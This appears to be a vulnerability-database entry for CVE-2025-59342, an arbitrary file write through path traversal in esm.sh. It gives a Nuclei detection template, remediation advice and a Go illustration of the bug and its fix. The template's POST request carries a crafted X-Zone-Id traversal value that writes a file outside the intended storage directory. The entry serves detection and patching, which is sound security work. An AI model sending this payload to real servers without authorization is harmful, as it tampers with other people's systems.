esm.sh <= v136 - Arbitrary File Write via Path Traversal
CVE-2025-59342
Verified
Description
esm.sh <= 136 contains a path traversal caused by improper canonicalization of the X-Zone-Id HTTP header, letting unauthenticated attackers write files outside the intended storage directory; exploitation requires only a crafted header value.
Severity
Medium
CVSS Score
5.3
Exploit Probability
6%
Affected Product
esm.sh
Published Date
April 17, 2026
Template Author
0x_akoko
CVE-2025-59342.yaml
id: CVE-2025-59342

info:
  name: esm.sh <= v136 - Arbitrary File Write via Path Traversal
  author: 0x_Akoko
  severity: medium
  description: |
    esm.sh <= 136 contains a path traversal caused by improper canonicalization of the X-Zone-Id HTTP header, letting unauthenticated attackers write files outside the intended storage directory; exploitation requires only a crafted header value.
  impact: |
    Attackers can write files to arbitrary directories, potentially leading to system compromise or data tampering.
  remediation: |
    Update to a version later than 136 or the latest available version.
  reference:
    - https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw
    - https://www.exploit-db.com/exploits/52461
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59342
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-59342
    cwe-id: CWE-24
    epss-score: 0.06448
    epss-percentile: 0.91174
  metadata:
    verified: true
    max-request: 2
    vendor: esm-dev
    product: esm.sh
    shodan-query: http.html:"esm.sh"
  tags: cve,cve2025,esm,path-traversal,file-write,unauth

variables:
  randfile: "{{to_lower(rand_text_alpha(8))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_any(body, "esm.sh", "A no-build JavaScript CDN", "import React from")
        condition: and
        internal: true

  - raw:
      - |
        POST /transform HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Zone-Id: ../../modules/transform/{{randfile}}/

        {"filename":"{{randfile}}.js","lang":"js","code":"console.log('nuclei');","importMap":{"imports":{"react":"https://esm.sh/react"}},"target":"es2022","sourceMap":"external","minify":true}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "application/json")
          - contains_all(body, "code", "map")
        condition: and
# digest: 4a0a00473045022100923ac9ede2082c365971eb160d73462d539949aa04df28ce9d8019abc98bd5ce022056b32028c690f623fbf1087a51c67f5e153430264f66f738704458407d5bd257:922c64590222798bb761d5b6d8e72950

Score
5.3
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE ID:
CVE-2025-59342
CWE ID:
CWE-24
Remediation Steps
Update to a version later than 136 or the latest available version.
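The root cause named above is a caller-controlled header value joined onto a storage root without checking where the cleaned result lands. The Go below is an added illustration of that bug class and of the canonicalize-then-contain fix; it is not esm.sh's code, and the storage root, function names and the fixed "nuclei" name standing in for {{randfile}} are assumptions. Note that the template's second matcher only confirms that /transform accepted the crafted X-Zone-Id and returned a transform result with "code" and "map"; it does not read back the file that was written, so a manual check of the target filesystem is still needed to prove the write landed outside the storage directory.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrTraversal is returned when a caller-controlled path component resolves
// outside the storage root.
var ErrTraversal = errors.New("path escapes storage root")

// unsafeZonePath reproduces the bug class from the advisory in generic form
// (illustration only, not esm.sh's code): the header value is joined onto the
// storage root and used as-is. filepath.Join cleans the result, so the ".."
// segments are resolved, but nothing checks where they resolved to.
func unsafeZonePath(storageRoot, zoneID, filename string) string {
	return filepath.Join(storageRoot, zoneID, filename)
}

// safeZonePath canonicalizes the candidate and rejects anything that does not
// stay beneath storageRoot. filepath.Rel expresses the candidate relative to
// the root; an escaped path comes back as ".." or "../...". The test is on a
// whole separator-delimited segment, so a legitimately named "..hidden" entry
// is not rejected by accident, and a sibling such as "/srv/esm/storage2"
// cannot slip past the way a plain string-prefix test on the root would allow.
func safeZonePath(storageRoot, zoneID, filename string) (string, error) {
	root := filepath.Clean(storageRoot)
	candidate := filepath.Join(root, zoneID, filename)
	rel, err := filepath.Rel(root, candidate)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrTraversal
	}
	return candidate, nil
}

func main() {
	// Constructed inputs: the storage root is hypothetical; the first zone id
	// has the shape of the header value the template sends, with a fixed name
	// in place of {{randfile}}.
	const root = "/srv/esm/storage"
	cases := []struct{ zone, file string }{
		{"../../modules/transform/nuclei/", "nuclei.js"}, // traversal
		{"zone1", "nuclei.js"},                            // ordinary request
		{"..hidden", "nuclei.js"},                         // looks like "..", is not
	}
	for _, c := range cases {
		fmt.Printf("X-Zone-Id: %q\n", c.zone)
		fmt.Printf("  unsafe: %s\n", unsafeZonePath(root, c.zone, c.file))
		if p, err := safeZonePath(root, c.zone, c.file); err != nil {
			fmt.Printf("  safe:   rejected (%v)\n", err)
		} else {
			fmt.Printf("  safe:   %s\n", p)
		}
	}
}
```

Run it as a plain `go run` program: the traversal case shows the unsafe join resolving to /srv/modules/transform/nuclei/nuclei.js, two levels above the root, while the contained version returns ErrTraversal for it and accepts the other two.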